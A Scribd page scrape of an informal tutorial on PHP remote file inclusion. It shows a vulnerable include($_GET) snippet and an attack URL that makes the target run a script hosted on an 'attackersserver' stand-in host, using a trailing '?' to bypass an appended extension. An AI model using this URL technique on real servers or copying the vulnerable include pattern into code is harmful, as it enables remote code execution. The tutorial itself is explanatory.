Scribd
Upload
61 views1 page

Remote File Inclusion

Remote file inclusion (RFI) is a web attack where an attacker can execute scripts on a vulnerable web server from a remote server. RFI works by exploiting PHP code that includes files via a GET parameter. An attacker can craft a URL that makes the vulnerable server include a malicious script hosted on the attacker's remote server. This executes the attacker's code on the target server. The vulnerability exists because the PHP include() function allows remote file links. By using a file with a .txt extension and adding a ? to the URL, the attacker can bypass protections and execute arbitrary code on the vulnerable server via a remote script.

Uploaded by

rheyzth
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
Download as docx, pdf, or txt
61 views1 page

Remote File Inclusion

Remote file inclusion (RFI) is a web attack where an attacker can execute scripts on a vulnerable web server from a remote server. RFI works by exploiting PHP code that includes files via a GET parameter. An attacker can craft a URL that makes the vulnerable server include a malicious script hosted on the attacker's remote server. This executes the attacker's code on the target server. The vulnerability exists because the PHP include() function allows remote file links. By using a file with a .txt extension and adding a ? to the URL, the attacker can bypass protections and execute arbitrary code on the vulnerable server via a remote script.

Uploaded by

rheyzth
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1/ 1

What is Remote File Inclusion ?

First of all what is Remote File Inclusion? Commonly referred as RFI, this is an uncommon form of web attack where the attacker can inject their own scripts and execute
it on the web server. I like to call RFI the execution of unpredictable and uncontrollable code.

I'm sure many of you who are reading this have attempted RFI and probably are saying that its a simple method of attack. But ill bet that not many know what occurs
behind the scene, how it works, and why it works. Today ill clarify that. 

So how does RFI work?


 
To know how RFI works, you need to have a really basic understanding of PHP. Its not really difficult to understand, but for those who do not understand PHP at all, ill be
explaining the code.

Lets say you have a site that is vulnerable to RFI, and its displaying the main page of the site as index.html. This is how the PHP could be scripted on the vulnerable site.

<?php
  $file =$_GET['index']; //The page we wish to display
  include($file);
?>

Code Examination:

Ok for those who dont know PHP, let me explain the code, for those who know it, move right along :)

$ is used to declare a variable and then you give it a value with the = sign. Then its using the GET parameter to fetch the index.html. Then lastly, the include($file) simply
tells the server to include the variable $file on the page on which is coded. So if you put this PHP code on the front page of the site, it will include the index.html and thats
why you can see the index of the site.

The URL of the site looking like this:


http://www.site.com/index.php?page=index.html

Well knowing this, an attacker can exploit the site using RFI like so:
http://www.site.com/index.php?page=http://www.attackersserver.com/my_evil_script.txt?

Before anything, let me explain what happens on the coding side.

<?php
  $file ="http://www.attackersserver.com/my_evil_script.txt?"; //$_GET['index'];
  include($file); //$file is the script the attacker is including.
?>

As you can see, our variable $file is no longer fetching the index.html, its including the script the attacker has included from a remote server, hence the name. Why does
this work? simply because of the include() function that lets you link files remotely.

As you can see the attacker has included a .txt file and not .php. Well why is that? The reason for this is because if the attacker would have put .php and had PHP installed,
the script will execute on his server and not the targets.

Also, you noticed that we added a ?, the reason we did this is because it removes anything that could be in the include() function.

Take this code for example:

<?php
  $file =$_GET['index'];
  include($file .".php");
?>

As you can see, there's more than just the variable $file in it, and that could pose an issue. The above script adds .php to any file that's being included. So if we
included http://www.attackersserver.com/my_evil_script.txt without the ?, we are really going to
seehttp://www.attackersserver.com/my_evil_script.txt.php because of what's inside of the include() function, which is BAD. So in order to make sure nothing is
inside the include() function, we add the ?

Well that's is folks, i hope you learned more about RFI than before. Many of you might know this, others not so much. But i hope it was able to help some people out.

You might also like